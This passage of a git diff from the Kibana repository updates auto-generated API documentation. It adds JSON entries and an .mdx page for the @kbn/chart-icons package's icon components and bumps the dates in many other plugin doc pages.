"IconChartBarHorizontalStacked", + "description": [], + "signature": [ + "({ title, titleId, ...props }: Omit<", + "EuiIconProps", + ", \"type\">) => JSX.Element" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_bar_horizontal_stacked.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartBarHorizontalStacked.$1", + "type": "Object", + "tags": [], + "label": "{\n title,\n titleId,\n ...props\n}", + "description": [], + "signature": [ + "Omit<", + "EuiIconProps", + ", \"type\">" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_bar_horizontal_stacked.tsx", + "deprecated": false, + "isRequired": true + } + ], + "returnComment": [], + "initialIsOpen": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartBarPercentage", + "type": "Function", + "tags": [], + "label": "IconChartBarPercentage", + "description": [], + "signature": [ + "({ title, titleId, ...props }: Omit<", + "EuiIconProps", + ", \"type\">) => JSX.Element" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_bar_percentage.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartBarPercentage.$1", + "type": "Object", + "tags": [], + "label": "{\n title,\n titleId,\n ...props\n}", + "description": [], + "signature": [ + "Omit<", + "EuiIconProps", + ", \"type\">" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_bar_percentage.tsx", + "deprecated": false, + "isRequired": true + } + ], + "returnComment": [], + "initialIsOpen": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartBarReferenceLine", + "type": "Function", + "tags": [], + "label": "IconChartBarReferenceLine", + "description": [], + "signature": [ + "({ title, titleId, ...props }: Omit<", + "EuiIconProps", + ", \"type\">) => JSX.Element" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_bar_reference_line.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartBarReferenceLine.$1", + "type": "Object", + "tags": [], + "label": "{\n title,\n titleId,\n ...props\n}", + "description": [], + "signature": [ + "Omit<", + "EuiIconProps", + ", \"type\">" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_bar_reference_line.tsx", + "deprecated": false, + "isRequired": true + } + ], + "returnComment": [], + "initialIsOpen": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartBarStacked", + "type": "Function", + "tags": [], + "label": "IconChartBarStacked", + "description": [], + "signature": [ + "({ title, titleId, ...props }: Omit<", + "EuiIconProps", + ", \"type\">) => JSX.Element" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_bar_stacked.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartBarStacked.$1", + "type": "Object", + "tags": [], + "label": "{ title, titleId, ...props }", + "description": [], + "signature": [ + "Omit<", + "EuiIconProps", + ", \"type\">" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_bar_stacked.tsx", + "deprecated": false, + "isRequired": true + } + ], + "returnComment": [], + "initialIsOpen": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartDatatable", + "type": "Function", + "tags": [], + "label": "IconChartDatatable", + "description": [], + "signature": [ + "({ title, titleId, ...props }: Omit<", + "EuiIconProps", + ", \"type\">) => JSX.Element" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_datatable.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartDatatable.$1", + "type": "Object", + "tags": [], + "label": "{ title, titleId, ...props }", + "description": [], + "signature": [ + "Omit<", + "EuiIconProps", + ", \"type\">" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_datatable.tsx", + "deprecated": false, + "isRequired": true + } + ], + "returnComment": [], + "initialIsOpen": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartDonut", + "type": "Function", + "tags": [], + "label": "IconChartDonut", + "description": [], + "signature": [ + "({ title, titleId, ...props }: Omit<", + "EuiIconProps", + ", \"type\">) => JSX.Element" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_donut.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartDonut.$1", + "type": "Object", + "tags": [], + "label": "{ title, titleId, ...props }", + "description": [], + "signature": [ + "Omit<", + "EuiIconProps", + ", \"type\">" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_donut.tsx", + "deprecated": false, + "isRequired": true + } + ], + "returnComment": [], + "initialIsOpen": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartHeatmap", + "type": "Function", + "tags": [], + "label": "IconChartHeatmap", + "description": [], + "signature": [ + "({ title, titleId, ...props }: Omit<", + "EuiIconProps", + ", \"type\">) => JSX.Element" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_heatmap.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartHeatmap.$1", + "type": "Object", + "tags": [], + "label": "{ title, titleId, ...props }", + "description": [], + "signature": [ + "Omit<", + "EuiIconProps", + ", \"type\">" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_heatmap.tsx", + "deprecated": false, + "isRequired": true + } + ], + "returnComment": [], + "initialIsOpen": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartHorizontalBullet", + "type": "Function", + "tags": [], + "label": "IconChartHorizontalBullet", + "description": [], + "signature": [ + "({ title, titleId, ...props }: Omit<", + "EuiIconProps", + ", \"type\">) => JSX.Element" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_horizontal_bullet.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartHorizontalBullet.$1", + "type": "Object", + "tags": [], + "label": "{\n title,\n titleId,\n ...props\n}", + "description": [], + "signature": [ + "Omit<", + "EuiIconProps", + ", \"type\">" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_horizontal_bullet.tsx", + "deprecated": false, + "isRequired": true + } + ], + "returnComment": [], + "initialIsOpen": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartLine", + "type": "Function", + "tags": [], + "label": "IconChartLine", + "description": [], + "signature": [ + "({ title, titleId, ...props }: Omit<", + "EuiIconProps", + ", \"type\">) => JSX.Element" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_line.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartLine.$1", + "type": "Object", + "tags": [], + "label": "{ title, titleId, ...props }", + "description": [], + "signature": [ + "Omit<", + "EuiIconProps", + ", \"type\">" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_line.tsx", + "deprecated": false, + "isRequired": true + } + ], + "returnComment": [], + "initialIsOpen": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartMetric", + "type": "Function", + "tags": [], + "label": "IconChartMetric", + "description": [], + "signature": [ + "({ title, titleId, ...props }: Omit<", + "EuiIconProps", + ", \"type\">) => JSX.Element" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_metric.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartMetric.$1", + "type": "Object", + "tags": [], + "label": "{ title, titleId, ...props }", + "description": [], + "signature": [ + "Omit<", + "EuiIconProps", + ", \"type\">" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_metric.tsx", + "deprecated": false, + "isRequired": true + } + ], + "returnComment": [], + "initialIsOpen": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartMixedXy", + "type": "Function", + "tags": [], + "label": "IconChartMixedXy", + "description": [], + "signature": [ + "({ title, titleId, ...props }: Omit<", + "EuiIconProps", + ", \"type\">) => JSX.Element" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_mixed_xy.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartMixedXy.$1", + "type": "Object", + "tags": [], + "label": "{ title, titleId, ...props }", + "description": [], + "signature": [ + "Omit<", + "EuiIconProps", + ", \"type\">" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_mixed_xy.tsx", + "deprecated": false, + "isRequired": true + } + ], + "returnComment": [], + "initialIsOpen": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartMosaic", + "type": "Function", + "tags": [], + "label": "IconChartMosaic", + "description": [], + "signature": [ + "({ title, titleId, ...props }: Omit<", + "EuiIconProps", + ", \"type\">) => JSX.Element" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_mosaic.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartMosaic.$1", + "type": "Object", + "tags": [], + "label": "{ title, titleId, ...props }", + "description": [], + "signature": [ + "Omit<", + "EuiIconProps", + ", \"type\">" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_mosaic.tsx", + "deprecated": false, + "isRequired": true + } + ], + "returnComment": [], + "initialIsOpen": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartPie", + "type": "Function", + "tags": [], + "label": "IconChartPie", + "description": [], + "signature": [ + "({ title, titleId, ...props }: Omit<", + "EuiIconProps", + ", \"type\">) => JSX.Element" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_pie.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartPie.$1", + "type": "Object", + "tags": [], + "label": "{ title, titleId, ...props }", + "description": [], + "signature": [ + "Omit<", + "EuiIconProps", + ", \"type\">" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_pie.tsx", + "deprecated": false, + "isRequired": true + } + ], + "returnComment": [], + "initialIsOpen": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartTreemap", + "type": "Function", + "tags": [], + "label": "IconChartTreemap", + "description": [], + "signature": [ + "({ title, titleId, ...props }: Omit<", + "EuiIconProps", + ", \"type\">) => JSX.Element" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_treemap.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartTreemap.$1", + "type": "Object", + "tags": [], + "label": "{ title, titleId, ...props }", + "description": [], + "signature": [ + "Omit<", + "EuiIconProps", + ", \"type\">" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_treemap.tsx", + "deprecated": false, + "isRequired": true + } + ], + "returnComment": [], + "initialIsOpen": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartVerticalBullet", + "type": "Function", + "tags": [], + "label": "IconChartVerticalBullet", + "description": [], + "signature": [ + "({ title, titleId, ...props }: Omit<", + "EuiIconProps", + ", \"type\">) => JSX.Element" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_vertical_bullet.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartVerticalBullet.$1", + "type": "Object", + "tags": [], + "label": "{\n title,\n titleId,\n ...props\n}", + "description": [], + "signature": [ + "Omit<", + "EuiIconProps", + ", \"type\">" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_vertical_bullet.tsx", + "deprecated": false, + "isRequired": true + } + ], + "returnComment": [], + "initialIsOpen": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartWaffle", + "type": "Function", + "tags": [], + "label": "IconChartWaffle", + "description": [], + "signature": [ + "({ title, titleId, ...props }: Omit<", + "EuiIconProps", + ", \"type\">) => JSX.Element" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_waffle.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartWaffle.$1", + "type": "Object", + "tags": [], + "label": "{ title, titleId, ...props }", + "description": [], + "signature": [ + "Omit<", + "EuiIconProps", + ", \"type\">" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_waffle.tsx", + "deprecated": false, + "isRequired": true + } + ], + "returnComment": [], + "initialIsOpen": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconCircle", + "type": "Function", + "tags": [], + "label": "IconCircle", + "description": [], + "signature": [ + "({ title, titleId, ...props }: Omit<", + "EuiIconProps", + ", \"type\">) => JSX.Element" + ], + "path": "packages/kbn-chart-icons/src/assets/annotation_icons/circle.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconCircle.$1", + "type": "Object", + "tags": [], + "label": "{ title, titleId, ...props }", + "description": [], + "signature": [ + "Omit<", + "EuiIconProps", + ", \"type\">" + ], + "path": "packages/kbn-chart-icons/src/assets/annotation_icons/circle.tsx", + "deprecated": false, + "isRequired": true + } + ], + "returnComment": [], + "initialIsOpen": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconRegionMap", + "type": "Function", + "tags": [], + "label": "IconRegionMap", + "description": [], + "signature": [ + "({ title, titleId, ...props }: Omit<", + "EuiIconProps", + ", \"type\">) => JSX.Element" + ], + "path": "packages/kbn-chart-icons/src/assets/region_map.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconRegionMap.$1", + "type": "Object", + "tags": [], + "label": "{\n title,\n titleId,\n ...props\n}", + "description": [], + "signature": [ + "Omit<", + "EuiIconProps", + ", \"type\">" + ], + "path": "packages/kbn-chart-icons/src/assets/region_map.tsx", + "deprecated": false, + "isRequired": true + } + ], + "returnComment": [], + "initialIsOpen": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconTriangle", + "type": "Function", + "tags": [], + "label": "IconTriangle", + "description": [], + "signature": [ + "({ title, titleId, ...props }: Omit<", + "EuiIconProps", + ", \"type\">) => JSX.Element" + ], + "path": "packages/kbn-chart-icons/src/assets/annotation_icons/triangle.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconTriangle.$1", + "type": "Object", + "tags": [], + "label": "{ title, titleId, ...props }", + "description": [], + "signature": [ + "Omit<", + "EuiIconProps", + ", \"type\">" + ], + "path": "packages/kbn-chart-icons/src/assets/annotation_icons/triangle.tsx", + "deprecated": false, + "isRequired": true + } + ], + "returnComment": [], + "initialIsOpen": false + } + ], + "interfaces": [], + "enums": [], + "misc": [], + "objects": [] + } +} \ No newline at end of file diff --git a/api_docs/kbn_chart_icons.mdx b/api_docs/kbn_chart_icons.mdx new file mode 100644 index 0000000000000..c50bef60ef8ba --- /dev/null +++ b/api_docs/kbn_chart_icons.mdx @@ -0,0 +1,30 @@ +--- +#### +#### This document is auto-generated and is meant to be viewed inside our experimental, new docs system. +#### Reach out in #docs-engineering for more info. +#### +id: kibKbnChartIconsPluginApi +slug: /kibana-dev-docs/api/kbn-chart-icons +title: "@kbn/chart-icons" +image: https://source.unsplash.com/400x175/?github +description: API docs for the @kbn/chart-icons plugin +date: 2022-08-18 +tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/chart-icons'] +--- +import kbnChartIconsObj from './kbn_chart_icons.devdocs.json'; + + + +Contact [Owner missing] for questions regarding this plugin. + +**Code health stats** + +| Public API count | Any count | Items lacking comments | Missing exports | +|-------------------|-----------|------------------------|-----------------| +| 76 | 0 | 76 | 0 | + +## Common + +### Functions + + diff --git a/api_docs/kbn_ci_stats_core.mdx b/api_docs/kbn_ci_stats_core.mdx index 200384f716dc2..dde1bcaa9dee9 100644 --- a/api_docs/kbn_ci_stats_core.mdx +++ b/api_docs/kbn_ci_stats_core.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-ci-stats-core title: "@kbn/ci-stats-core" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/ci-stats-core plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/ci-stats-core'] --- import kbnCiStatsCoreObj from './kbn_ci_stats_core.devdocs.json'; diff --git a/api_docs/kbn_ci_stats_performance_metrics.mdx b/api_docs/kbn_ci_stats_performance_metrics.mdx index 054bc2a03faff..b7b59159634c2 100644 --- a/api_docs/kbn_ci_stats_performance_metrics.mdx +++ b/api_docs/kbn_ci_stats_performance_metrics.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-ci-stats-performance-metrics title: "@kbn/ci-stats-performance-metrics" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/ci-stats-performance-metrics plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/ci-stats-performance-metrics'] --- import kbnCiStatsPerformanceMetricsObj from './kbn_ci_stats_performance_metrics.devdocs.json'; diff --git a/api_docs/kbn_ci_stats_reporter.mdx b/api_docs/kbn_ci_stats_reporter.mdx index 21492cfbd83ad..d9bfb8667b2a6 100644 --- a/api_docs/kbn_ci_stats_reporter.mdx +++ b/api_docs/kbn_ci_stats_reporter.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-ci-stats-reporter title: "@kbn/ci-stats-reporter" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/ci-stats-reporter plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/ci-stats-reporter'] --- import kbnCiStatsReporterObj from './kbn_ci_stats_reporter.devdocs.json'; diff --git a/api_docs/kbn_cli_dev_mode.mdx b/api_docs/kbn_cli_dev_mode.mdx index f3c1405677ac7..d51e3700d16aa 100644 --- a/api_docs/kbn_cli_dev_mode.mdx +++ b/api_docs/kbn_cli_dev_mode.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-cli-dev-mode title: "@kbn/cli-dev-mode" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/cli-dev-mode plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/cli-dev-mode'] --- import kbnCliDevModeObj from './kbn_cli_dev_mode.devdocs.json'; diff --git a/api_docs/kbn_coloring.mdx b/api_docs/kbn_coloring.mdx index d01aac1cbb5fc..7705a2cf7972d 100644 --- a/api_docs/kbn_coloring.mdx +++ b/api_docs/kbn_coloring.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-coloring title: "@kbn/coloring" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/coloring plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/coloring'] --- import kbnColoringObj from './kbn_coloring.devdocs.json'; diff --git a/api_docs/kbn_config.mdx b/api_docs/kbn_config.mdx index d52e7742717d1..f39b8e20075f6 100644 --- a/api_docs/kbn_config.mdx +++ b/api_docs/kbn_config.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-config title: "@kbn/config" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/config plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/config'] --- import kbnConfigObj from './kbn_config.devdocs.json'; diff --git a/api_docs/kbn_config_mocks.mdx b/api_docs/kbn_config_mocks.mdx index fba53cbd266b6..b6ee6ead75a68 100644 --- a/api_docs/kbn_config_mocks.mdx +++ b/api_docs/kbn_config_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-config-mocks title: "@kbn/config-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/config-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/config-mocks'] --- import kbnConfigMocksObj from './kbn_config_mocks.devdocs.json'; diff --git a/api_docs/kbn_config_schema.mdx b/api_docs/kbn_config_schema.mdx index 65ebc8396ead3..c4ae0af7c4f81 100644 --- a/api_docs/kbn_config_schema.mdx +++ b/api_docs/kbn_config_schema.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-config-schema title: "@kbn/config-schema" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/config-schema plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/config-schema'] --- import kbnConfigSchemaObj from './kbn_config_schema.devdocs.json'; diff --git a/api_docs/kbn_core_analytics_browser.mdx b/api_docs/kbn_core_analytics_browser.mdx index b2f2731c6944a..5f6f01e888195 100644 --- a/api_docs/kbn_core_analytics_browser.mdx +++ b/api_docs/kbn_core_analytics_browser.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-analytics-browser title: "@kbn/core-analytics-browser" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-analytics-browser plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-analytics-browser'] --- import kbnCoreAnalyticsBrowserObj from './kbn_core_analytics_browser.devdocs.json'; diff --git a/api_docs/kbn_core_analytics_browser_internal.mdx b/api_docs/kbn_core_analytics_browser_internal.mdx index 2cc30f1147a1c..f2498bc39e07b 100644 --- a/api_docs/kbn_core_analytics_browser_internal.mdx +++ b/api_docs/kbn_core_analytics_browser_internal.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-analytics-browser-internal title: "@kbn/core-analytics-browser-internal" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-analytics-browser-internal plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-analytics-browser-internal'] --- import kbnCoreAnalyticsBrowserInternalObj from './kbn_core_analytics_browser_internal.devdocs.json'; diff --git a/api_docs/kbn_core_analytics_browser_mocks.mdx b/api_docs/kbn_core_analytics_browser_mocks.mdx index 1e2edb5eaeb95..61425d9dca3fc 100644 --- a/api_docs/kbn_core_analytics_browser_mocks.mdx +++ b/api_docs/kbn_core_analytics_browser_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-analytics-browser-mocks title: "@kbn/core-analytics-browser-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-analytics-browser-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-analytics-browser-mocks'] --- import kbnCoreAnalyticsBrowserMocksObj from './kbn_core_analytics_browser_mocks.devdocs.json'; diff --git a/api_docs/kbn_core_analytics_server.mdx b/api_docs/kbn_core_analytics_server.mdx index cb94c8b9494fa..2f112706584ff 100644 --- a/api_docs/kbn_core_analytics_server.mdx +++ b/api_docs/kbn_core_analytics_server.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-analytics-server title: "@kbn/core-analytics-server" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-analytics-server plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-analytics-server'] --- import kbnCoreAnalyticsServerObj from './kbn_core_analytics_server.devdocs.json'; diff --git a/api_docs/kbn_core_analytics_server_internal.mdx b/api_docs/kbn_core_analytics_server_internal.mdx index cacd59f057952..c87d439806803 100644 --- a/api_docs/kbn_core_analytics_server_internal.mdx +++ b/api_docs/kbn_core_analytics_server_internal.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-analytics-server-internal title: "@kbn/core-analytics-server-internal" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-analytics-server-internal plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-analytics-server-internal'] --- import kbnCoreAnalyticsServerInternalObj from './kbn_core_analytics_server_internal.devdocs.json'; diff --git a/api_docs/kbn_core_analytics_server_mocks.mdx b/api_docs/kbn_core_analytics_server_mocks.mdx index 39e6f8b9cc05c..e301ffa8f211f 100644 --- a/api_docs/kbn_core_analytics_server_mocks.mdx +++ b/api_docs/kbn_core_analytics_server_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-analytics-server-mocks title: "@kbn/core-analytics-server-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-analytics-server-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-analytics-server-mocks'] --- import kbnCoreAnalyticsServerMocksObj from './kbn_core_analytics_server_mocks.devdocs.json'; diff --git a/api_docs/kbn_core_base_browser_mocks.mdx b/api_docs/kbn_core_base_browser_mocks.mdx index 7089249d73c1c..ddc62c4071e39 100644 --- a/api_docs/kbn_core_base_browser_mocks.mdx +++ b/api_docs/kbn_core_base_browser_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-base-browser-mocks title: "@kbn/core-base-browser-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-base-browser-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-base-browser-mocks'] --- import kbnCoreBaseBrowserMocksObj from './kbn_core_base_browser_mocks.devdocs.json'; diff --git a/api_docs/kbn_core_base_common.mdx b/api_docs/kbn_core_base_common.mdx index 344b327a51fa3..a5f81385f4727 100644 --- a/api_docs/kbn_core_base_common.mdx +++ b/api_docs/kbn_core_base_common.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-base-common title: "@kbn/core-base-common" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-base-common plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-base-common'] --- import kbnCoreBaseCommonObj from './kbn_core_base_common.devdocs.json'; diff --git a/api_docs/kbn_core_base_server_internal.mdx b/api_docs/kbn_core_base_server_internal.mdx index d97df985b2cc5..20d2872052992 100644 --- a/api_docs/kbn_core_base_server_internal.mdx +++ b/api_docs/kbn_core_base_server_internal.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-base-server-internal title: "@kbn/core-base-server-internal" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-base-server-internal plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-base-server-internal'] --- import kbnCoreBaseServerInternalObj from './kbn_core_base_server_internal.devdocs.json'; diff --git a/api_docs/kbn_core_base_server_mocks.mdx b/api_docs/kbn_core_base_server_mocks.mdx index c0d9ed974893e..e101e6a86dfdb 100644 --- a/api_docs/kbn_core_base_server_mocks.mdx +++ b/api_docs/kbn_core_base_server_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-base-server-mocks title: "@kbn/core-base-server-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-base-server-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-base-server-mocks'] --- import kbnCoreBaseServerMocksObj from './kbn_core_base_server_mocks.devdocs.json'; diff --git a/api_docs/kbn_core_capabilities_common.mdx b/api_docs/kbn_core_capabilities_common.mdx index 00de3e24c0395..1f81aa2d10cb5 100644 --- a/api_docs/kbn_core_capabilities_common.mdx +++ b/api_docs/kbn_core_capabilities_common.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-capabilities-common title: "@kbn/core-capabilities-common" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-capabilities-common plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-capabilities-common'] --- import kbnCoreCapabilitiesCommonObj from './kbn_core_capabilities_common.devdocs.json'; diff --git a/api_docs/kbn_core_capabilities_server.mdx b/api_docs/kbn_core_capabilities_server.mdx index a292574afac25..bed55a52ebec9 100644 --- a/api_docs/kbn_core_capabilities_server.mdx +++ b/api_docs/kbn_core_capabilities_server.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-capabilities-server title: "@kbn/core-capabilities-server" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-capabilities-server plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-capabilities-server'] --- import kbnCoreCapabilitiesServerObj from './kbn_core_capabilities_server.devdocs.json'; diff --git a/api_docs/kbn_core_capabilities_server_mocks.mdx b/api_docs/kbn_core_capabilities_server_mocks.mdx index 8ac3389495849..225de5c88817e 100644 --- a/api_docs/kbn_core_capabilities_server_mocks.mdx +++ b/api_docs/kbn_core_capabilities_server_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-capabilities-server-mocks title: "@kbn/core-capabilities-server-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-capabilities-server-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-capabilities-server-mocks'] --- import kbnCoreCapabilitiesServerMocksObj from './kbn_core_capabilities_server_mocks.devdocs.json'; diff --git a/api_docs/kbn_core_config_server_internal.mdx b/api_docs/kbn_core_config_server_internal.mdx index cb80decee13df..8d66574809afc 100644 --- a/api_docs/kbn_core_config_server_internal.mdx +++ b/api_docs/kbn_core_config_server_internal.mdx @@ -8,7 +8,7 @@ slug: 